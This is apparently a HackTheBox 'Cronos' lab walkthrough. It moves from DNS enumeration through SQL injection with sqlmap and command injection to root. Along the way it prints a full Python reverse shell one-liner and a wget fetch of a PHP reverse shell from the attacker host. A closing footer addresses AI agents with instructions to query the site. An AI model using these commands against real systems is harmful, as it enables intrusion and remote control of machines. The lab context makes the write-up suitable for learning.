# Cronos
## Nmap
```
sudo nmap 10.10.10.13 -p- -sS -sV
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
**Note:** Add `10.10.10.13 cronos.htb` to `/etc/hosts`. Also add 10.10.10.13 as an additional DNS server on the attacking system.
### DNS
To start we perform some basic enumeration on `DNS` against the target system. Using dnsenum we are able to enumerate the `admin.cronos.htb` sub domain which will be added to our hosts file.
```
dnsenum --dnsserver '10.10.10.13' --enum 'cronos.htb'
```
### Cronos.htb
Checkout out the root page for `http://cronos.htb` we are taken to `/index.php`. I was unable to pull any further interesting pages or directories from this website.
`Feroxbuster` turning up very few results...
### admin.cronos.htb
We know that the sub domain admin.cronos.htb exists and browse to it. We are presented with a logon page. Running ZAProxy in the background we are able to identify a `SQL` injection point on the login page as shown below.
Details regarding the `SQL` injection point.
### SQLmap
Using `SQLmap` we are able to pull relevant information.
```
sqlmap -u 'http://admin.cronos.htb/' --batch --forms --tables
```
After running the above command `SQLmap` identifies the database "admin". Using the command below we are able to dump discovered information from the "users" table.
```
sqlmap -u 'http://admin.cronos.htb/' --batch --forms -T users -D admin --dump
```
I was unable to crack the hash using the rockyou.txt wordlist. However, searhing online we find a clear text password for the related MD5 hash.
### Hash lookup
### Net Tool v0.1
Using the credentials on the login page we are then presented with `Net Tool v0.1`.
Performing a `ping` request and capturing the POST request in `ZAProxy` we see where the command parameter is set.
A quick check with `cat` on `/etc/passwd` shows we are able to alter what command the target system executes.
Contents of `/etc/passwd`.
### Shell as www-data
From here we will build a Python reverse shell and run it in ZAProxy to obtain a reverse shell.
```
export RHOST="10.10.14.6";export RPORT=80;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
Which soon connects to our listener.
### User.txt
We can then grab the user flag from `/home/noulis/user.txt`.
### Enumeration
Running `linpeas.sh` for enumeration we identify the cron job against Laravel artisan running every minute as the **root** user.
Browsing to `/var/www/laravel` we see we have full permissions as www-data over the artisan file.
### Privilege Escalation
Given the full permissions we can create a `PHP` reverse shell on our attacking system. Name it artisan and transfer over to the target system. RevShells was utilized to create the PHP monkey reverse shell.
**RevShells:**
Remove the current artisan file and upload the reverse shell file.
```
rm artisan
wget http://10.10.14.6:8000/artisan
```
### Shell as root
After the file has been uploaded. Start a `netcat` listener and wait a minute or two for it to trigger a reverse shell.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://viperone.gitbook.io/pentest-everything/writeups/hackthebox/linux/cronos.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.